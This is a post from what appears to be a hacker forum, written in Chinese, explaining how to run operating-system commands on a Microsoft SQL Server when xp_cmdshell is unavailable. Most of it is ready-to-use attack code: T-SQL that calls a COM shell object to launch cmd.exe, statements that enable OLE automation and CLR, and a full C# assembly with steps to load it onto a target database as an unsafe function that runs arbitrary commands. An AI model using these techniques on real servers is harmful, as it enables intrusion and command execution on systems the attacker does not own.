Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

sql server没xp_cmdshell执行命令

 Share


Recommended Posts

利用COM执行命令

(需要开启Ole Automation Procedures组件)

declare @luan int,@exec int,@text int,@str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output;
exec sp_oamethod @luan,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out;
select @str;

sZs3hd.png

没有开启Ole Automation Procedures,可以用下面的命令开启

sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO

编写CLR实现执行命令

编写语言:C#
Vs创建类库

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System;
using System.Threading.Tasks;

namespace shellexec
{
    public class exec
    {
        public static string cmd(string command)
        {
            System.Diagnostics.Process pro = new System.Diagnostics.Process();
            pro.StartInfo.FileName = "cmd.exe";
            pro.StartInfo.UseShellExecute = false;
            pro.StartInfo.RedirectStandardError = true; //标准错误
            pro.StartInfo.RedirectStandardInput = true; //标准输入
            pro.StartInfo.RedirectStandardOutput = true; //标准输出
            pro.StartInfo.CreateNoWindow = true; //是否在新窗口开启进程
            pro.Start();
            pro.StandardInput.WriteLine(command + "&&exit"); //命令参数写入
            pro.StandardInput.AutoFlush = true; //缓冲区自动刷新
            string output = pro.StandardOutput.ReadToEnd(); //读取执行结果
            pro.WaitForExit(); //等待执行完成退出
            pro.Close();
            return output.ToString();
        }
    }
}

生成dll后,可以用hex的方法写到目标,或者shell上传。然后开始构造

1.目标数据库实例需要启用clr集成

exec sp_configure 'clr enabled', 1;--在SQL Server中启用CLR
reconfigure;
go

 

2.目标数据库的可信任属性需要设为false,可以使用以下语句启用

ALTER DATABASE [<数据库名称>] SET TRUSTWORTHY ON

 

3.在数据库中注册DLL

CREATE ASSEMBLY MySqlCLR FROM '<dll的路径>' //MySqlCLR为导入dll后的变量名称

 

4.创建函数
(根据对应函数的类型的参数构造对应的参数类型,然后RETURNS [nvarchar] (max)记得设置为返回最大如果是返回string类型的话),在直接这个dll的名称在那个命名空间、类、函数)

CREATE FUNCTION [dbo].[cmd2]  
(  
    @cmd AS NVARCHAR(max)
)  
RETURNS [nvarchar] (max) WITH EXECUTE AS CALLER
AS  
EXTERNAL NAME [MySqlCLR].[shellexec.exec].cmd //shellexec为命名空间,exec为类名,cmd为函数名
GO

5.程序集的权限级别必须设为 external access,否则在部署的时候会报错
ALTER ASSEMBLY [MySqlCLR]
WITH PERMISSION_SET = UNSAFE

6.调用存储过程和函数方法
select [dbo].[cmd2]('whoami')

 

sZs6cq.png
sZsWHU.png

参考链接:
https://blog.csdn.net/catchme_439/article/details/78411009
https://zhuanlan.zhihu.com/p/33322584?from_voters_page=true

Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...